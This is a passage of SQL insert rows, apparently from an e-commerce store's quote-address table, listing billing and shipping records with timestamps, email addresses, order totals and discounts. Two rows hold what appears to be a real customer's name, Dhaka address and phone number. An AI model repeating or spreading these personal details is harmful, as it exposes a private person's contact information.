(354, 358, '2023-11-26 22:37:28', '2023-11-26 22:37:28', 81, 0, NULL, 'shipping', 'UKlRFi.tdwcpwb@borasca.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(355, 359, '2023-12-01 00:22:48', '2023-12-01 00:22:48', 82, 0, NULL, 'billing', 'mXJwLI.ddwjjjc@paravane.biz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(356, 359, '2023-12-01 00:22:48', '2023-12-01 00:22:48', 82, 0, NULL, 'shipping', 'mXJwLI.ddwjjjc@paravane.biz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(357, 360, '2023-12-02 06:52:19', '2023-12-02 06:52:19', 83, 0, NULL, 'billing', 'JpdHmx.mhqwpp@virilia.life', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(358, 360, '2023-12-02 06:52:19', '2023-12-02 06:52:19', 83, 0, NULL, 'shipping', 'JpdHmx.mhqwpp@virilia.life', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(359, 361, '2023-12-07 10:59:18', '2023-12-07 10:59:18', 84, 0, NULL, 'billing', 'vnYduX.qcchhhd@tonetics.biz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(360, 361, '2023-12-07 10:59:18', '2023-12-07 10:59:18', 84, 0, NULL, 'shipping', 'vnYduX.qcchhhd@tonetics.biz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(361, 362, '2023-12-08 12:58:10', '2023-12-08 12:58:10', 85, 0, NULL, 'billing', 'nihaca9350@newcupon.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(362, 362, '2023-12-08 12:58:10', '2023-12-08 12:58:10', 85, 0, NULL, 'shipping', 'nihaca9350@newcupon.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(363, 363, '2023-12-10 12:24:35', '2023-12-10 12:24:35', 86, 0, NULL, 'billing', 'enWHil.pwqwtmh@usufruct.bar', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(364, 363, '2023-12-10 12:24:35', '2023-12-10 12:24:35', 86, 0, NULL, 'shipping', 'enWHil.pwqwtmh@usufruct.bar', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(365, 364, '2023-12-12 04:13:58', '2023-12-12 04:13:58', 87, 0, NULL, 'billing', 'LJvenn.twtjtbb@brasswire.me', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(366, 364, '2023-12-12 04:13:58', '2023-12-12 04:13:58', 87, 0, NULL, 'shipping', 'LJvenn.twtjtbb@brasswire.me', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(367, 365, '2023-12-13 18:55:52', '2023-12-13 18:55:52', 88, 0, NULL, 'billing', 'VSszAf.wbwhdcm@usufruct.bar', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(368, 365, '2023-12-13 18:55:52', '2023-12-13 18:55:52', 88, 0, NULL, 'shipping', 'VSszAf.wbwhdcm@usufruct.bar', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(369, 366, '2023-12-15 15:09:38', '2023-12-15 15:09:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(370, 366, '2023-12-15 15:09:38', '2023-12-15 15:09:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(371, 367, '2023-12-19 09:58:31', '2023-12-19 09:58:31', NULL, 0, NULL, 'billing', NULL, NULL, 'Asir', NULL, 'Faisal', NULL, NULL, 'Mirpur 10', 'Dhaka', 'Dhaka', NULL, '1012', 'BD', '01865876217', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(372, 367, '2023-12-19 09:58:31', '2023-12-19 09:59:35', NULL, 0, NULL, 'shipping', NULL, NULL, 'Asir', NULL, 'Faisal', NULL, NULL, 'Mirpur 10', 'Dhaka', 'Dhaka', NULL, '1012', 'BD', '01865876217', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(373, 368, '2023-12-31 13:54:47', '2023-12-31 13:54:47', 89, 0, NULL, 'billing', 'AsdUld.btbbbwp@purline.top', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(374, 368, '2023-12-31 13:54:48', '2023-12-31 13:54:48', 89, 0, NULL, 'shipping', 'AsdUld.btbbbwp@purline.top', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(375, 369, '2023-12-31 16:54:02', '2023-12-31 16:54:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(376, 369, '2023-12-31 16:54:02', '2023-12-31 16:54:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(377, 370, '2023-12-31 16:54:16', '2023-12-31 16:54:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(378, 370, '2023-12-31 16:54:16', '2023-12-31 16:54:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(379, 371, '2023-12-31 16:54:27', '2023-12-31 16:54:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(380, 371, '2023-12-31 16:54:27', '2023-12-31 16:54:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(381, 372, '2023-12-31 16:54:40', '2023-12-31 16:54:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(382, 372, '2023-12-31 16:54:40', '2023-12-31 16:54:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(383, 373, '2023-12-31 16:54:55', '2023-12-31 16:54:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(384, 373, '2023-12-31 16:54:55', '2023-12-31 16:54:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(385, 374, '2024-01-01 21:04:18', '2024-01-01 21:04:18', 90, 0, NULL, 'billing', 'xEMMrX.bmpbhch@lustrum.cfd', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(386, 374, '2024-01-01 21:04:18', '2024-01-01 21:04:18', 90, 0, NULL, 'shipping', 'xEMMrX.bmpbhch@lustrum.cfd', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(387, 375, '2024-01-06 10:19:57', '2024-01-06 10:19:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(388, 375, '2024-01-06 10:19:57', '2024-01-06 10:19:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(389, 376, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(390, 379, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(391, 377, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(392, 380, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(393, 378, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(394, 379, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(395, 380, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(396, 377, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(397, 378, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(398, 376, '2024-01-13 05:36:16', '2024-01-13 05:36:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
